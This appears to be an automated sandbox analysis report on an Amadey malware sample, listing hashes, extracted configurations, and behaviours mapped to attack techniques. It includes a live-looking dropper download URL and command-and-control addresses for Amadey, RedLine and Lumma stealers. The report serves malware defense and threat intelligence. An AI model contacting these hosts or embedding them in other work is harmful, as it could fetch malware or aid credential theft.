amadey | ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599

Analysis

max time kernel
134s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
08/03/2025, 14:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
Size

1.8MB
MD5

e25f93527c1781d2b55ff83860b0c92c
SHA1

6c01d61a4cd0c00d4c102206903553f263447064
SHA256

ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599
SHA512

2b5275a1e76eca33cac38cb22da31afbb5d3a414b3517632fe01f98b5a75618bd38431394c3ee11879dbbf8bae7ac998a74bd905012a2138a79e29548db4b0dc
SSDEEP

49152:ef+ZeL4wbrvcCvXVki2/OXDKdkROwLJUn2EDISQHyBj+:JeUAvXOmXDKdkRlSn2Oj

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

redline

Botnet

Build 7

101.99.92.190:40919

Extracted

Family

lumma

https://nebdulaq.digital/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://acatterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://biochextryhub.bet/api

https://q8explorebieology.run/api

https://gadgethgfub.icu/api

https://moderzysics.top/api

https://5ktechmindzs.live/api

https://6codxefusion.top/api

https://7phygcsforum.life/api

https://techspherxe.top/api

https://earthsymphzony.today/api

https://j8arisechairedd.shop/api

https://gmodelshiverd.icu/api

Extracted

Family

lumma

https://moderzysics.top/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/2264-45-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/2264-45-0x0000000000400000-0x000000000041E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 2636 created 3592	2636	Occupation.com	56
PID 2636 created 3592	2636	Occupation.com	56
PID 4072 created 3592	4072	Seat.com	56
PID 4072 created 3592	4072	Seat.com	56

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CgmaT61.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	afe14a332c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	10ff9f0669.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	57c0971734.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	yUI6F6C.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9S3WM9XDGZ4D8BWQTGUTTQAKK.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
8288	powershell.exe
4668	powershell.exe
6024	powershell.exe
2512	powershell.exe
808	powershell.exe
8504	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
4436	bitsadmin.exe

Downloads MZ/PE file 20 IoCs

flow	pid	Process
24	3220	rapes.exe
24	3220	rapes.exe
24	3220	rapes.exe
24	3220	rapes.exe
24	3220	rapes.exe
45	2264	PfOHmro.exe
105	3220	rapes.exe
131	6272	PfOHmro.exe
152	3220	rapes.exe
237	3220	rapes.exe
241	3220	rapes.exe
241	3220	rapes.exe
69	2876	mIrI3a9.exe
95	4392	a.exe
226	2632	afe14a332c.exe
118	3220	rapes.exe
118	3220	rapes.exe
193	3220	rapes.exe
193	3220	rapes.exe
102	3220	rapes.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5236	msedge.exe
7236	msedge.exe
7284	msedge.exe
6688	chrome.exe
184	chrome.exe
7148	msedge.exe
6520	msedge.exe
4772	chrome.exe
6692	chrome.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x0010000000023b30-5711.dat	net_reactor
behavioral2/memory/5784-5879-0x00000000007D0000-0x0000000000830000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	yUI6F6C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	afe14a332c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	10ff9f0669.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9S3WM9XDGZ4D8BWQTGUTTQAKK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	57c0971734.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	afe14a332c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	57c0971734.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CgmaT61.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	yUI6F6C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	10ff9f0669.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CgmaT61.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9S3WM9XDGZ4D8BWQTGUTTQAKK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	mIrI3a9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	zY9sqWs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	ReK7Ewx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	PfOHmro.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	mAtJWNv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	ReK7Ewx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	PfOHmro.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	ADFoyxP.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Control Panel\International\Geo\Nation	Gyfhvf.exe

Drops startup file 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ExploreClient.lnk	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ExploreClient.lnk	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url	cmd.exe

Executes dropped EXE 45 IoCs

pid	Process
3220	rapes.exe
1896	PfOHmro.exe
2264	PfOHmro.exe
3108	ReK7Ewx.exe
2636	Occupation.com
2876	mIrI3a9.exe
644	FvbuInU.exe
2528	rapes.exe
3472	v6Oqdnc.exe
4392	a.exe
6020	HmngBpR.exe
5704	SplashWin.exe
5240	SplashWin.exe
5152	PfOHmro.exe
6272	PfOHmro.exe
5804	RegAsm.exe
5628	Gyfhvf.exe
5784	mAtJWNv.exe
3920	mAtJWNv.exe
5840	CgmaT61.exe
5912	zY9sqWs.exe
5324	Gxtuum.exe
6204	EdgeBHO.exe
6152	EdgeBHO.exe
7064	EdgeBHO.exe
2832	EdgeBHO.exe
3048	ADFoyxP.exe
5128	rapes.exe
4072	Seat.com
6304	yUI6F6C.exe
2312	Gxtuum.exe
6412	Vhbyv.exe
2044	V0Bt74c.exe
5516	V0Bt74c.exe
4652	Gyfhvf.exe
5044	ReK7Ewx.exe
2632	afe14a332c.exe
7852	10ff9f0669.exe
8036	Occupation.com
8136	9S3WM9XDGZ4D8BWQTGUTTQAKK.exe
2208	f953d9af5b.exe
6904	Vhbyv.exe
5600	57c0971734.exe
9568	EdgeBHO.exe
10232	EdgeBHO.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	yUI6F6C.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	afe14a332c.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	10ff9f0669.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	9S3WM9XDGZ4D8BWQTGUTTQAKK.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	57c0971734.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	FvbuInU.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Wine	CgmaT61.exe

Loads dropped DLL 33 IoCs

pid	Process
5704	SplashWin.exe
5704	SplashWin.exe
5704	SplashWin.exe
5240	SplashWin.exe
5240	SplashWin.exe
5240	SplashWin.exe
6152	EdgeBHO.exe
6152	EdgeBHO.exe
6152	EdgeBHO.exe
6152	EdgeBHO.exe
6152	EdgeBHO.exe
6152	EdgeBHO.exe
6152	EdgeBHO.exe
6152	EdgeBHO.exe
6152	EdgeBHO.exe
2832	EdgeBHO.exe
2832	EdgeBHO.exe
2832	EdgeBHO.exe
2832	EdgeBHO.exe
2832	EdgeBHO.exe
2832	EdgeBHO.exe
2832	EdgeBHO.exe
2832	EdgeBHO.exe
2832	EdgeBHO.exe
10232	EdgeBHO.exe
10232	EdgeBHO.exe
10232	EdgeBHO.exe
10232	EdgeBHO.exe
10232	EdgeBHO.exe
10232	EdgeBHO.exe
10232	EdgeBHO.exe
10232	EdgeBHO.exe
10232	EdgeBHO.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key queried	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	a.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	a.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\10ff9f0669.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10141660101\\10ff9f0669.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hosts = "C:\\Users\\Admin\\AppData\\Roaming\\hosts.exe"	Vhbyv.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f953d9af5b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10141670101\\f953d9af5b.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\57c0971734.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10141680101\\57c0971734.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EdgeBHO.exe"	EdgeBHO.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\EdgeBHO.exe"	EdgeBHO.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\license = "C:\\Users\\Admin\\AppData\\Roaming\\license.exe"	Gyfhvf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\afe14a332c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10141650101\\afe14a332c.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023e2c-9940.dat	autoit_exe
behavioral2/files/0x000c000000023323-18323.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
7008	tasklist.exe
5312	tasklist.exe
7240	tasklist.exe
224	tasklist.exe
3680	tasklist.exe
5464	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
4464	ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599.exe
3220	rapes.exe
644	FvbuInU.exe
2528	rapes.exe
3472	v6Oqdnc.exe
5840	CgmaT61.exe
5128	rapes.exe
6304	yUI6F6C.exe
2632	afe14a332c.exe
7852	10ff9f0669.exe
8136	9S3WM9XDGZ4D8BWQTGUTTQAKK.exe
5600	57c0971734.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1896 set thread context of 2264	1896	PfOHmro.exe	96
PID 5152 set thread context of 6272	5152	PfOHmro.exe	150
PID 5240 set thread context of 7124	5240	SplashWin.exe	147
PID 5784 set thread context of 3920	5784	mAtJWNv.exe	156
PID 2044 set thread context of 5516	2044	V0Bt74c.exe	209
PID 5628 set thread context of 4652	5628	Gyfhvf.exe	212
PID 5804 set thread context of 3336	5804	RegAsm.exe	246
PID 6412 set thread context of 6904	6412	Vhbyv.exe	257

UPX packed file 20 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/6152-7271-0x00007FFCF6E90000-0x00007FFCF74F4000-memory.dmp	upx
behavioral2/memory/6152-7273-0x00007FFD0C580000-0x00007FFD0C58F000-memory.dmp	upx
behavioral2/memory/6152-7272-0x00007FFD0C450000-0x00007FFD0C477000-memory.dmp	upx
behavioral2/memory/6152-7274-0x00007FFD0C430000-0x00007FFD0C449000-memory.dmp	upx
behavioral2/memory/6152-7275-0x00007FFD0C400000-0x00007FFD0C42B000-memory.dmp	upx
behavioral2/memory/6152-7276-0x00007FFD0C3F0000-0x00007FFD0C3FF000-memory.dmp	upx
behavioral2/memory/6152-7286-0x00007FFD0C450000-0x00007FFD0C477000-memory.dmp	upx
behavioral2/memory/6152-7288-0x00007FFD0C3F0000-0x00007FFD0C3FF000-memory.dmp	upx
behavioral2/memory/6152-7287-0x00007FFCF6E90000-0x00007FFCF74F4000-memory.dmp	upx
behavioral2/memory/2832-7344-0x00007FFCF6E90000-0x00007FFCF74F4000-memory.dmp	upx
behavioral2/memory/2832-7346-0x00007FFD0C580000-0x00007FFD0C58F000-memory.dmp	upx
behavioral2/memory/2832-7345-0x00007FFD0C450000-0x00007FFD0C477000-memory.dmp	upx
